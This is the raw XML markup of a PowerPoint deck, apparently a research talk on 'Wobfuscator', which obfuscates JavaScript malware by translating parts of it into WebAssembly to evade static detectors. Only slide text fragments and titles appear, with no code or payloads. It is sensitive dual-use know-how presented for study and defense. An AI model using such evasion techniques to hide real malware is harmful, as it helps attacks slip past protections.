                <a:sym typeface="Calibri"/>
              </a:rPr>
              <a:t>Motivate future efforts on detecting cross-language malware</a:t>
            </a:r>
            <a:endParaRPr sz="14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chemeClr val="dk2"/>
              </a:buClr>
              <a:buSzPts val="1800"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr sz="2000" b="1" i="0" u="none" strike="noStrike" cap="none">
              <a:solidFill>
                <a:srgbClr val="767CFC"/>
              </a:solidFill>
              <a:latin typeface="Calibri"/>
              <a:ea typeface="Calibri"/>
              <a:cs typeface="Calibri"/>
              <a:sym typeface="Calibri"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="296" name="Google Shape;29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a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="311700" y="91440"/>
            <a:ext cx="8520600" cy="84410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General JavaScript-to-WebAssembly Translation </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en" b="1">
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
                <a:sym typeface="Calibri"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en" b="1">
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
                <a:sym typeface="Calibri"/>
              </a:rPr>
              <a:t>Is Practically Impossible</a:t>
            </a:r>
            <a:endParaRPr b="1">
              <a:latin typeface="Calibri"/>
              <a:ea typeface="Calibri"/>
              <a:cs typeface="Calibri"/>
              <a:sym typeface="Calibri"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="302" name="Google Shape;302;p34"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="364551" y="2188725"/>
            <a:ext cx="3987300" cy="18288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sz="2000">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
                <a:sym typeface="Calibri"/>
              </a:rPr>
              <a:t>Dynamically typed w/ objects</a:t>
            </a:r>
            <a:endParaRPr sz="2000">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Calibri"/>
              <a:ea typeface="Calibri"/>
              <a:cs typeface="Calibri"/>
              <a:sym typeface="Calibri"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="457200" lvl="0" indent="-342900" algn="l" rtl="0">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1800"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="2000">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
                <a:sym typeface="Calibri"/>
              </a:rPr>
              <a:t>Direct access to Web APIs</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="303" name="Google Shape;303;p34"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="6467635" y="1260387"/>
            <a:ext cx="914400" cy="914400"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="304" name="Google Shape;304;p34"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId4">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="2076563" y="1260387"/>
            <a:ext cx="914400" cy="914400"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="305" name="Google Shape;305;p34"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4862325" y="2188725"/>
            <a:ext cx="4125000" cy="1219500"/>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chemeClr val="dk2"/>
              </a:buClr>
              <a:buSzPts val="1800"/>
              <a:buFont typeface="Arial"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="2000" b="0" i="0" u="none" strike="noStrike" cap="none">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
                <a:sym typeface="Calibri"/>
              </a:rPr>
              <a:t>Statically typed w/ 4 data types</a:t>
            </a:r>
            <a:endParaRPr sz="1400" b="0" i="0" u="none" strike="noStrike" cap="none">
              <a:solidFill>
                <a:srgbClr val="000000"/>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Char char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="2000" b="0" i="0" u="none" strike="noStrike" cap="none">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
                <a:sym typeface="Calibri"/>
              </a:rPr>
              <a:t>Indirect access to Web APIs via JS</a:t>
            </a:r>
            <a:endParaRPr sz="1400" b="0" i="0" u="none" strike="noStrike" cap="none">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
              <a:ea typeface="Arial"/>
              <a:cs typeface="Arial"/>
              <a:sym typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="306" name="Google Shape;306;p34"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1804061" y="3732190"/>
            <a:ext cx="5535900" cy="708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1" u="none" strike="noStrike" cap="none">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
                <a:sym typeface="Calibri"/>
              </a:rPr>
              <a:t>(i) relevant for detecting malicious code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1" u="none" strike="noStrike" cap="none">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
                <a:sym typeface="Calibri"/>
              </a:rPr>
              <a:t>(ii) can be translated in a semantics-preserving way </a:t>
            </a:r>
            <a:endParaRPr sz="1400" b="0" i="0" u="none" strike="noStrike" cap="none">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
              <a:ea typeface="Arial"/>
              <a:cs typeface="Arial"/>
              <a:sym typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="307" name="Google Shape;307;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sp>
        <p:nvSpPr>
          <p:cNvPr id="308" name="Google Shape;308;p34"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1999040" y="3270525"/>
            <a:ext cx="47052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0000"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
                <a:sym typeface="Calibri"/>
              </a:rPr>
              <a:t>Opportunistic </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="2400" b="1" i="0" u="none" strike="noStrike" cap="none">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
                <a:sym typeface="Calibri"/>
              </a:rPr>
              <a:t>translation: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11402</Words>
  <Application>Microsoft Office PowerPoint</Application>
  <PresentationFormat>On-screen Show (16:9)</PresentationFormat>
  <Paragraphs>1277</Paragraphs>
  <Slides>57</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57</vt:i4>
      </vt:variant>
    </vt:vector>
  </HeadingPairs>
  <TitlesOfParts>
    <vt:vector size="63" baseType="lpstr">
      <vt:lpstr>Arial</vt:lpstr>
      <vt:lpstr>Courier New</vt:lpstr>
      <vt:lpstr>Calibri</vt:lpstr>
      <vt:lpstr>Inconsolata</vt:lpstr>
      <vt:lpstr>Simple Light</vt:lpstr>
      <vt:lpstr>Simple Light</vt:lpstr>
      <vt:lpstr>Wobfuscator: Obfuscating JavaScript Malware via Opportunistic Translation to WebAssembly </vt:lpstr>
      <vt:lpstr>Web Attacks</vt:lpstr>
      <vt:lpstr>Static Web-Based Malware Detectors</vt:lpstr>
      <vt:lpstr>Obfuscation Techniques</vt:lpstr>
      <vt:lpstr>Obfuscation Techniques</vt:lpstr>
      <vt:lpstr>WebAssembly Provides a New Opportunity</vt:lpstr>
      <vt:lpstr>What Is WebAssembly?</vt:lpstr>
      <vt:lpstr>Wobfuscator</vt:lpstr>
      <vt:lpstr>General JavaScript-to-WebAssembly Translation  Is Practically Impossible</vt:lpstr>
      <vt:lpstr>Wobfuscator Overview</vt:lpstr>
      <vt:lpstr>Transformation Rule (L, t, p)</vt:lpstr>
      <vt:lpstr>Transformation Rules</vt:lpstr>
      <vt:lpstr>Transformation Rules</vt:lpstr>
      <vt:lpstr>Transformation Rules</vt:lpstr>
      <vt:lpstr>Transformation Rules</vt:lpstr>
      <vt:lpstr>Transformation Rules</vt:lpstr>
      <vt:lpstr>Transformation Rules</vt:lpstr>
      <vt:lpstr>T1-StringLiteral Transformation</vt:lpstr>
      <vt:lpstr>T4-CallExpression(a) Transformation</vt:lpstr>
      <vt:lpstr>T5-IfStatement Transformation</vt:lpstr>
      <vt:lpstr>Example: Unwanted Tracking</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Transforming Strings, Function Calls, If Statements</vt:lpstr>
      <vt:lpstr>Evaluation</vt:lpstr>
      <vt:lpstr>Datasets for Evaluating Effectiveness </vt:lpstr>
      <vt:lpstr>Web-Based Malware Detectors</vt:lpstr>
      <vt:lpstr>Effectiveness in Evading Detection</vt:lpstr>
      <vt:lpstr>Recall of Malware Detectors</vt:lpstr>
      <vt:lpstr>Recall of Malware Detectors</vt:lpstr>
      <vt:lpstr>Mitigation Strategies</vt:lpstr>
      <vt:lpstr>Related Work</vt:lpstr>
      <vt:lpstr>Wobfuscator: Takeaways</vt:lpstr>
      <vt:lpstr>References</vt:lpstr>
      <vt:lpstr>References (cont.)</vt:lpstr>
      <vt:lpstr>References (cont.) </vt:lpstr>
      <vt:lpstr>References (cont.)</vt:lpstr>
      <vt:lpstr>References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Wobfuscator: Obfuscating JavaScript Malware via Opportunistic Translation to WebAssembly </dc:title>
  <cp:lastModifiedBy>Alan Romano</cp:lastModifiedBy>
  <cp:revision>1</cp:revision>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2024-02-15T23:33:02Z</dcterms:modified>
</cp:coreProperties>
</file>